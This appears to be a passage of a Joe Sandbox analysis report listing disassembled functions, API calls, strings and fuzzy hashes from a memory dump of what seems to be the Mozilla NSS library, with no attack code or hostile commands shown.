Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: CertificateDestroyEnterMonitor$Alloc_ArenaCertCriticalExitSectionUnlockUtilValue
String ID: /G6/
API String ID: 3982693653-570549270
Opcode ID: 43ee53001362be68513b6f4c8a5a825ea6b23a200dbdd0666c886495605f1d11
Instruction ID: 5872da45d8fb90f81e2cce3ef9a76143231f8cd8620a2c95cd2d05e72eeff8f3
Opcode Fuzzy Hash: 43ee53001362be68513b6f4c8a5a825ea6b23a200dbdd0666c886495605f1d11
Instruction Fuzzy Hash: 9551F3B2A011055BEF00AE369F88AAF7778EF45359F184034EC19A7F11EB20E915C6E1

Function 6C6D88D0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(00000000,00000000,01DC7D83), ref: 6C6D8990

Strings

@znl, xrefs: 6C6D8A31

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: memset
String ID: @znl
API String ID: 2221118986-1548485117
Opcode ID: 156f91af5013782ad97ae5162f3ae51cac0dee4330d33f249bf64f484a8de1a8
Instruction ID: 2467a01163431c0038ecce4e3d96c4154dfd3119eccde9de2d06ffbf43635a65
Opcode Fuzzy Hash: 156f91af5013782ad97ae5162f3ae51cac0dee4330d33f249bf64f484a8de1a8
Instruction Fuzzy Hash: 9E511671A057819FC704CF28C5946A6BBF0BF29308B24A29EC8884BB13D371F596CBD5

Function 6C752A60 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 133COMMON

Download Yara Rule

APIs

PK11_GenerateKeyPairWithOpFlags.NSS3(00000000,00000020,00000000,?,0000008A,00000000,00000000,?), ref: 6C752B6D
PK11_GenerateKeyPairWithOpFlags.NSS3(00000000,00000020,00000000,?,00000046,00000000,00000000,?), ref: 6C752B8B
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C752BAD

Strings

/G6/, xrefs: 6C752A69

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: FlagsGenerateK11_PairWith$Error
String ID: /G6/
API String ID: 4225680832-570549270
Opcode ID: a7e12adc6e1fe3a32f68f28b18c877800368e77630d9bbf1f849f9bc4b9b5b1b
Instruction ID: ac5e7b3e3f6d8c2066e6378bcd5269e29731e2fefbbc18106396c9cd92a07b0d
Opcode Fuzzy Hash: a7e12adc6e1fe3a32f68f28b18c877800368e77630d9bbf1f849f9bc4b9b5b1b
Instruction Fuzzy Hash: 0D410372F002165BFB118E25CE4DFAB3669AB80368F994134ED589BA81FF319D50C3D0

Function 6C794D10 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 106COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE001,00000000), ref: 6C794D57
PR_snprintf.NSS3(?,00000008,%d.%d,?,?), ref: 6C794DE6

Strings

%d.%d, xrefs: 6C794DDE
/G6/, xrefs: 6C794D1F

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: ErrorR_snprintf
String ID: %d.%d$/G6/
API String ID: 2298970422-875627066
Opcode ID: f4460b0ba9bd8e59c57c68777bcb391ab390668447158b5b04ab430f508484d3
Instruction ID: 982ab163e434b351e50faddf522833a80da439dde42ab4007f0511ba53ac26cc
Opcode Fuzzy Hash: f4460b0ba9bd8e59c57c68777bcb391ab390668447158b5b04ab430f508484d3
Instruction Fuzzy Hash: 3431DEB6D042186BEB205BA5AD0AFFF7768EF45308F050429ED159B751EB309909CBE1

Function 6C792E60 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(6C76F471,?,?,?,00000002,00000000,00000000,?,6C76D06D), ref: 6C792EA4
EnterCriticalSection.KERNEL32(?), ref: 6C792EB8
PR_Unlock.NSS3(?), ref: 6C792EEA

Strings

/G6/, xrefs: 6C792E6F

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: CriticalEnterSectionUnlockValue
String ID: /G6/
API String ID: 1419708843-570549270
Opcode ID: 62778fa2f81971064ad2cedf086dcc7500f3b75e3960498830cef6bc4cef60b9
Instruction ID: df013c9dab41d75283f59d56060962f5d8b4df383e42138f6c51e5260f33fa5a
Opcode Fuzzy Hash: 62778fa2f81971064ad2cedf086dcc7500f3b75e3960498830cef6bc4cef60b9
Instruction Fuzzy Hash: 1831C231A042158BDF10EF29DA8C6AA77B9FF49368F450675DC199B602D730D854CBD1

Function 6C762F60 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 85COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C762F8D
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 6C762FA1
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 6C76301E

Strings

/G6/, xrefs: 6C762F6F

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: CriticalEnterSectionUnlockValue
String ID: /G6/
API String ID: 1419708843-570549270
Opcode ID: d2e85e15f31d23f26ae51c2e938db09ed1b49b923ee07f0ef77e9e25edb590a9
Instruction ID: abd71bc44770ae1752351d69a0c03c81c123547324561fa9d24caebca112770d
Opcode Fuzzy Hash: d2e85e15f31d23f26ae51c2e938db09ed1b49b923ee07f0ef77e9e25edb590a9
Instruction Fuzzy Hash: 4C21E4B5A005099BEF009F69DD499AB7BB5EF45358F444038EC0897B11EB31ED18C7E1

Function 6C7D8A20 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 81COMMON

Download Yara Rule

APIs

NSS_GetAlgorithmPolicy.NSS3(00000159,?,?,?,?,6C7DA76A,?,00000000,?,6C7D80C1), ref: 6C7D8A57
NSS_OptionGet.NSS3(-00000008,?), ref: 6C7D8A7C
NSS_OptionGet.NSS3(-00000009,?), ref: 6C7D8A9C

Strings

/G6/, xrefs: 6C7D8A2D

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: Option$AlgorithmPolicy
String ID: /G6/
API String ID: 927613807-570549270
Opcode ID: 10083cefdb8e6eeb973be479047331cef9ce9d89b45f5b3f5626646253251604
Instruction ID: 14c95085cfabf6d43b8e49facb3a4b79b81c6f3fdf0679c51105420fba5bff19
Opcode Fuzzy Hash: 10083cefdb8e6eeb973be479047331cef9ce9d89b45f5b3f5626646253251604
Instruction Fuzzy Hash: 4D210522B1130747EB048AB9CD96BBFB3E9FF80208F49453AC815D2640FB64E849C3A1

Function 6C6D6C90 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 76COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000134E5,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?), ref: 6C6D6D36

Strings

%s at line %d of [%.10s], xrefs: 6C6D6D2F
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C6D6D20
database corruption, xrefs: 6C6D6D2A

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 632333372-598938438
Opcode ID: 950312d5247fefdf0340bfb22537a927a300320a9a7cfc398451c286b730e576
Instruction ID: 45e359df980e84c6e9a95ac2959e528e070db0a4c93bbfb8dc021cd64e1cd619
Opcode Fuzzy Hash: 950312d5247fefdf0340bfb22537a927a300320a9a7cfc398451c286b730e576
Instruction Fuzzy Hash: 612124306003049BC320CF1AE841B9AB7F2EF85308F254D2CD8499BF51E370F9488BAA

Function 6C7B2FD0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?,-000000D4,00000000,?,<+{l,6C7B32C2,<+{l,00000000,00000000,?), ref: 6C7B2FDA

Part of subcall function 6C7A14C0: TlsGetValue.KERNEL32 ref: 6C7A14E0
Part of subcall function 6C7A14C0: EnterCriticalSection.KERNEL32 ref: 6C7A14F5
Part of subcall function 6C7A14C0: PR_Unlock.NSS3 ref: 6C7A150D

PORT_ArenaAlloc_Util.NSS3(?,-00000007), ref: 6C7B300B

Part of subcall function 6C7A10C0: TlsGetValue.KERNEL32(?,6C748802,00000000,00000008,?,6C73EF74,00000000), ref: 6C7A10F3
Part of subcall function 6C7A10C0: EnterCriticalSection.KERNEL32(?,?,6C748802,00000000,00000008,?,6C73EF74,00000000), ref: 6C7A110C
Part of subcall function 6C7A10C0: PL_ArenaAllocate.NSS3(?,?,?,6C748802,00000000,00000008,?,6C73EF74,00000000), ref: 6C7A1141
Part of subcall function 6C7A10C0: PR_Unlock.NSS3(?,?,?,6C748802,00000000,00000008,?,6C73EF74,00000000), ref: 6C7A1182
Part of subcall function 6C7A10C0: TlsGetValue.KERNEL32(?,6C748802,00000000,00000008,?,6C73EF74,00000000), ref: 6C7A119C

SECOID_FindOIDByTag_Util.NSS3(00000010), ref: 6C7B302A

Part of subcall function 6C7A0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C7A08B4

Part of subcall function 6C78C3D0: PK11_ImportPublicKey.NSS3(?,?,00000000), ref: 6C78C45D
Part of subcall function 6C78C3D0: TlsGetValue.KERNEL32 ref: 6C78C494
Part of subcall function 6C78C3D0: EnterCriticalSection.KERNEL32(?), ref: 6C78C4A9
Part of subcall function 6C78C3D0: PR_Unlock.NSS3(?), ref: 6C78C4F4

Strings

<+{l, xrefs: 6C7B2FD0

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: Value$ArenaCriticalEnterSectionUnlockUtil$Alloc_AllocateErrorFindImportK11_Mark_PublicTag_
String ID: <+{l
API String ID: 2538134263-661568586
Opcode ID: 595581cd8a3e58213a728435827faa4a7978b5385ddb469e9c4028bda8901334
Instruction ID: 5af5c3ddd629e00eb3d2791631bc404057aa75dedc8997b1f3f1d4bfff321429
Opcode Fuzzy Hash: 595581cd8a3e58213a728435827faa4a7978b5385ddb469e9c4028bda8901334
Instruction Fuzzy Hash: 15110DB6B00104ABDB008E65DD44A9B77DA9F8426CF194234F91CD7780EB72ED56C7D1

Function 6C80CC70 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

Part of subcall function 6C80CD70: PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6C80CC7B), ref: 6C80CD7A
Part of subcall function 6C80CD70: PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6C80CD8E
Part of subcall function 6C80CD70: PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6C80CDA5
Part of subcall function 6C80CD70: PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6C80CDB8

PR_GetUniqueIdentity.NSS3(Ipv6_to_Ipv4 layer), ref: 6C80CCB5
memcpy.VCRUNTIME140(6C8A14F4,6C8A02AC,00000090), ref: 6C80CCD3
memcpy.VCRUNTIME140(6C8A1588,6C8A02AC,00000090), ref: 6C80CD2B

Part of subcall function 6C729AC0: socket.WSOCK32(?,00000017,6C7299BE), ref: 6C729AE6
Part of subcall function 6C729AC0: ioctlsocket.WSOCK32(00000000,8004667E,00000001,?,00000017,6C7299BE), ref: 6C729AFC

Part of subcall function 6C730590: closesocket.WSOCK32(6C729A8F,?,?,6C729A8F,00000000), ref: 6C730597

Strings

Ipv6_to_Ipv4 layer, xrefs: 6C80CCB0

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: FindSymbol$memcpy$IdentityLibraryLoadUniqueclosesocketioctlsocketsocket
String ID: Ipv6_to_Ipv4 layer
API String ID: 1231378898-412307543
Opcode ID: b71ad4ad1fefc0786f7fde1682bed593bc0f1a0598b773376d5f202c1709be24
Instruction ID: 59ffd04e5857f97730db1e3fd97318b816a13ef33732fae7e3caea3002d90a0e
Opcode Fuzzy Hash: b71ad4ad1fefc0786f7fde1682bed593bc0f1a0598b773376d5f202c1709be24
Instruction Fuzzy Hash: A51175B5B00250DEDB709FEDAE0674A3AA8934631CF941839E5068BB41E7B5C418CBD6

Function 6C852BE0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 49COMMON

Download Yara Rule

APIs

PR_EnterMonitor.NSS3 ref: 6C852BFA
PR_ExitMonitor.NSS3 ref: 6C852C2B
PR_LogPrint.NSS3(%s incr => %d (for %s),?,?,?), ref: 6C852C5D

Strings

%s incr => %d (for %s), xrefs: 6C852C58

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: Monitor$EnterExitPrint
String ID: %s incr => %d (for %s)
API String ID: 2736670396-2912983388
Opcode ID: d376074d69e429b4c08f3fe0c73ac47c752693c4d321111c3a4b970584d12f74
Instruction ID: 5310ed992cb308d2bf739407d723fb4f4adeec9098747ba95fa16f983f7514c9
Opcode Fuzzy Hash: d376074d69e429b4c08f3fe0c73ac47c752693c4d321111c3a4b970584d12f74
Instruction Fuzzy Hash: 87012271B001109BDB318F1AEE0864B73B9EB4532CB454834D808C3B12DA35EC28C791

Function 6C758850 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

calloc.MOZGLUE(00000001,00000028,00000000,?,?,6C760715), ref: 6C758859
PR_NewLock.NSS3 ref: 6C758874

Part of subcall function 6C8098D0: calloc.MOZGLUE(00000001,00000084,6C730936,00000001,?,6C73102C), ref: 6C8098E5

PL_InitArenaPool.NSS3(-00000008,NSS,00000800,00000008), ref: 6C75888D

Strings

NSS, xrefs: 6C758887

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: calloc$ArenaInitLockPool
String ID: NSS
API String ID: 2230817933-3870390017
Opcode ID: 12461de22dff22b00b281f4b06be8262a6b0e0b64a948c2c32b254d0e529fdfe
Instruction ID: 8366b6b9888af3ef625dface15858f25a3ee7b14309f49829ba7a77393312975
Opcode Fuzzy Hash: 12461de22dff22b00b281f4b06be8262a6b0e0b64a948c2c32b254d0e529fdfe
Instruction Fuzzy Hash: 00F0F6A2E9162027F210116A6E0EB8775889F5175EF440431E90CA7F82EF52A529C2E2

Function 6C730E80 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37networkCOMMON

Download Yara Rule

APIs

ioctlsocket.WSOCK32(?,4004667F,?), ref: 6C730EB4
WSAGetLastError.WSOCK32(?,4004667F,?), ref: 6C730ED2
PR_SetError.NSS3(FFFFE891,00000000,?,4004667F,?), ref: 6C730EDD

Strings

/G6/, xrefs: 6C730E9A

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: Error$Lastioctlsocket
String ID: /G6/
API String ID: 1402776735-570549270
Opcode ID: c73d6c2e3f093a79ade2849bf75b2bd5d77f2fa3ee5907b2a40b68652e016998
Instruction ID: c5f5973a6908d563e2c9e3cacc689a77b2aec4e0ab2119c3b71265730a7b03a9
Opcode Fuzzy Hash: c73d6c2e3f093a79ade2849bf75b2bd5d77f2fa3ee5907b2a40b68652e016998
Instruction Fuzzy Hash: 41F02431B8412C6B8A00ABACDD008AEBB6CEF0421AF804079EC096B741EA31AD18C7D5

Function 6C7EA890 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31COMMON

Download Yara Rule

APIs

PK11_FreeSymKey.NSS3(?,00000000,?,6C7D5F25,?,?,?,?,?,?,?,?,?,6C7DAAD4), ref: 6C7EA8A3

Part of subcall function 6C78ADC0: TlsGetValue.KERNEL32(?,6C76CDBB,?,6C76D079,00000000,00000001), ref: 6C78AE10
Part of subcall function 6C78ADC0: EnterCriticalSection.KERNEL32(?,?,6C76CDBB,?,6C76D079,00000000,00000001), ref: 6C78AE24
Part of subcall function 6C78ADC0: PR_Unlock.NSS3(?,?,?,?,?,?,6C76D079,00000000,00000001), ref: 6C78AE5A
Part of subcall function 6C78ADC0: memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6C76CDBB,?,6C76D079,00000000,00000001), ref: 6C78AE6F
Part of subcall function 6C78ADC0: free.MOZGLUE(85145F8B,?,?,?,?,6C76CDBB,?,6C76D079,00000000,00000001), ref: 6C78AE7F
Part of subcall function 6C78ADC0: TlsGetValue.KERNEL32(?,6C76CDBB,?,6C76D079,00000000,00000001), ref: 6C78AEB1
Part of subcall function 6C78ADC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C76CDBB,?,6C76D079,00000000,00000001), ref: 6C78AEC9

PK11_FreeSymKey.NSS3(?,00000000,?,6C7D5F25,?,?,?,?,?,?,?,?,?,6C7DAAD4), ref: 6C7EA8BA
SECITEM_ZfreeItem_Util.NSS3(%_}l,00000000,00000000,?,6C7D5F25,?,?,?,?,?,?,?,?,?,6C7DAAD4), ref: 6C7EA8CF

Strings

%_}l, xrefs: 6C7EA894, 6C7EA8CE

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: CriticalEnterFreeK11_SectionValue$Item_UnlockUtilZfreefreememset
String ID: %_}l
API String ID: 2877228265-266191701
Opcode ID: b16a70b903cc38075fb4249cbbbca92e95fa54b179f7f7db8e85030c0cea554f
Instruction ID: 0386b624f76def1e944795f358143e12cb347f2effc6117f47b4442192eb5cdf
Opcode Fuzzy Hash: b16a70b903cc38075fb4249cbbbca92e95fa54b179f7f7db8e85030c0cea554f
Instruction Fuzzy Hash: B8F0A0B3A0171457EA119A16E809B9377ECAB0067DF448034E81A97B41E325E80587E1

Function 6C6C8AE3 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 144stringCOMMON

Download Yara Rule

APIs

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C890148,BINARY), ref: 6C6C8B24

Strings

k(%d, xrefs: 6C6C8AF8
,%s%s%s, xrefs: 6C6C8B5B
BINARY, xrefs: 6C6C8B1E

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: strcmp
String ID: ,%s%s%s$BINARY$k(%d
API String ID: 1004003707-1903017921
Opcode ID: a791433f80e56962a82a931d561db6839e3f4e19953f5a7afed2421f77027847
